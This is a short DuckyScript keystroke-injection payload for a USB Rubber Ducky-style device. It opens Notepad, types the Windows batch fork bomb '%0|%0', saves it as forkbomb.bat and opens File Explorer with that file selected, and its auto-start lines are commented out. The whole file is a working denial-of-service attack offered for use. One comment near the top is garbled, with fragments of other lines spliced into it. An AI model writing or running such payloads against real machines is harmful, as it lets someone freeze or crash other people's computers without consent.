REM Forkbomb script by Rhymeswithjack
REM automatically creates a .bat file and locates it in file explorer
REM  but does not start it automatically by default

REM set delays to times that work for your compuepad
%0|%0ter

DELAY 5000
GUI
DELAY 1000
STRING notepad
DELAY 1000
ENTER
DELAY 1000
STRING %0|%0
DELAY 1000
CONTROL S
DELAY 1000
STRING forkbomb.bat
DELAY 1000
TAB
DELAY 1000
A
DELAY 1000
ENTER
DELAY 1000
GUI
DELAY 1000
STRING file explorer
DELAY 5000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 2000
STRING forkbomb.bat

REM AUTOMATIC START

REM DELAY 1000
REM ENTER